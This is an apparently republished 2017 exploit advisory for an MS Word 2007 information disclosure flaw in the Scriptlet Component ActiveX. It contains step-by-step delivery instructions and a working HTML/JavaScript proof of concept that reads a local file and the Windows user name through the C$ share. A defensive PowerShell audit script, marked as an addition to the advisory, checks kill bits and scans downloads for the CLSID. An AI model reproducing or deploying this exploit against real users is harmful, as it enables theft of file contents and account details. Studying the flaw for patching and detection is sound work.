Microsoft Word 2007 (x86) - Information Disclosure
Source: vfocus.net  Author: Prado  Published: 2017-10-10
Title: MS Office Word Information Disclosure Vulnerability
 
Date: September 30th, 2017.
 
Author: Eduardo Braun Prado
 
Vendor Homepage: http://www.microsoft.com/
 
Software Link: https://products.office.com/
 
Version: 2007 32-bit (x86)
 
Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP (X86 and x64)
 
CVE: N/A
 
 
Description:
 
MS Office Word contains an Internet Explorer (IE) script execution issue through a currently well-known vector:
the "Microsoft Scriptlet Component" ActiveX.
Originally found by security researcher Juan Pablo Lopez Yacubian and made public in May 2008, this issue
allows web pages to be displayed inline in Office documents, rendered by the IE rendering engine.
This facilitates attacks against the IE rendering engine because some enhanced security features
are not enabled by default. However, Microsoft did not think it suitable to disable the ActiveX
back in 2008, for some unknown reason. Additionally, it was not (publicly) known that you could pass
relative URLs to the ActiveX, causing Word/Works documents to reference themselves as HTML, potentially
disclosing sensitive information to attackers, such as file contents, the Windows user name, etc.
 
The PoC below will display, in an alert box, the contents of 'WindowsUpdate.log'. Depending on the
Windows patch level, this file used to be located in the "c:\windows" directory, but currently it resides in
the profile directory of the user that applied the updates:

c:\users\%username%\AppData\Local\Microsoft\Windows
 
 
Instructions:
 
a) Save the code below as "Disclose_File.WPS" and host it on your web server of choice.
 
b) Download it using your preferred web browser, and save it to one of your user's profile subfolders.
(This could be the home directory too; however, nowadays most browsers by default will save the file to the
'Downloads' folder.)

c) Open it and wait for an alert box showing the contents of "WindowsUpdate.log" to appear. Note that you
can pick any file as long as you know its full path.
 
Important: the file must be downloaded and forced into the "Internet Zone" of IE through the mark of
the web, which several programs append to files downloaded from the web.

-------------Disclose_File.WPS------------------------------------------------------------
<html><body>

<!-- if you want another file name for the Word/Works document, overwrite 'Disclose_File.wps' with
the file name you wish -->

<object classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389>
<param name=url value="Disclose_File.wps">
</object>

<script language=javascript>

var loc = document.location.href.toLowerCase();

// strip the "file:///" prefix (8 characters) so the path components can be split on '/'
var locNoProtocol = loc.substring(8, loc.length);

var b1 = locNoProtocol.indexOf(String.fromCharCode(47));
var b2 = locNoProtocol.indexOf(String.fromCharCode(47), b1 + 1);
var b3 = locNoProtocol.indexOf(String.fromCharCode(47), b2 + 1);
var b4 = locNoProtocol.indexOf(String.fromCharCode(47), b3 + 1);

// returns the Windows user name, when this document is referenced
// through the default "C$" share (127.0.0.1/c$/users/<user>/...).
var usr = locNoProtocol.substring(b3 + 1, b4);

var fileToDisclose = "file://127.0.0.1/c$/users/" + usr + "/appdata/local/microsoft/windows/windowsupdate.log";
// change the above path to match another file you wish to grab the contents of.

// Assuming the drive letter for the Windows install, including the user's profile, is 'c:'
var t = loc.indexOf("c:");
var tr = loc.indexOf("c$");

if (t != -1)
{
    // first pass: opened from a local path; re-open the same document through the C$ share
    var ns = loc.substring(t + 2, loc.length);
    document.write('<iframe src="file://127.0.0.1/c$' + ns + '"></iframe>');
}
else if (tr != -1)
{
    // second pass: now referenced via the share, so the user name is known and the file can be read
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.Open("GET", fileToDisclose, 0);
    x.Send();
    var fileContents = x.ResponseText;
    alert(fileContents);
}

</script>

</body>
</html>
-------------------------------------------------------------------------------------------------------------------
 
Vulnerable: MS Office 2007
 
MS Office 2010, 2013 and 2016 have kill-bitted this ActiveX through Office-specific kill bit settings. If an attacker
is able to somehow bypass it, the vulnerability will surely affect the latest versions.
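The two defensive checks a practitioner wants here are whether the Scriptlet Component is actually kill-bitted (the mitigation the paragraph above relies on) and whether any downloaded documents carry both that CLSID and the mark of the web the instructions require. The following PowerShell is an added example, not part of the advisory; it is read-only and assumes the documented "Compatibility Flags" kill bit locations for IE and Office (the Wow6432Node path is assumed for 32-bit Office on 64-bit Windows).

```powershell
# Added example (not from the advisory): audit the kill bit for the Microsoft
# Scriptlet Component CLSID and list downloaded documents that embed it,
# reporting whether each carries the mark of the web (Zone.Identifier stream).
$ScriptletClsid = '{AE24FDAE-03C6-11D1-8B76-0080C744F389}'
$KillBitFlag    = 0x400   # "Compatibility Flags" bit that disables an ActiveX control

# Assumed kill bit locations; Wow6432Node covers 32-bit Office on 64-bit Windows
$KillBitKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$ScriptletClsid",
    "HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility\$ScriptletClsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\$ScriptletClsid"
)

function Test-ScriptletKillBit {
    foreach ($key in $KillBitKeys) {
        $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        [pscustomobject]@{
            Key      = $key
            KillBit  = [bool]($flags -band $KillBitFlag)   # $null -band x -> 0 -> false
            RawFlags = if ($null -eq $flags) { 'not set' } else { '0x{0:X}' -f $flags }
        }
    }
}

function Find-ScriptletDocuments {
    param([string]$Root = "$env:USERPROFILE\Downloads")
    # The CLSID appears in the HTML without braces, so search for the bare GUID
    $pattern = $ScriptletClsid.Trim('{}')
    Get-ChildItem -Path $Root -Recurse -File -Include *.wps,*.doc,*.dot,*.htm,*.html `
                  -ErrorAction SilentlyContinue |
        Where-Object { Select-String -Path $_.FullName -Pattern $pattern -Quiet } |
        ForEach-Object {
            $zone = Get-Content -Path $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
            [pscustomobject]@{
                File    = $_.FullName
                HasMotW = [bool]$zone
                ZoneId  = ($zone | Where-Object { $_ -like 'ZoneId=*' }) -replace 'ZoneId=', ''
            }
        }
}

Test-ScriptletKillBit   | Format-Table -AutoSize
Find-ScriptletDocuments | Format-Table -AutoSize
```

A KillBit of False on every key means the control is still loadable; a listed document with HasMotW True and ZoneId 3 is exactly the condition the instructions above describe.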
 
Tested on: Any Windows version that supports Office 2007.
 
Greets to: Juan Pablo Lopez Yacubian, my good friend and original discoverer of the IE Script Exec issue.
 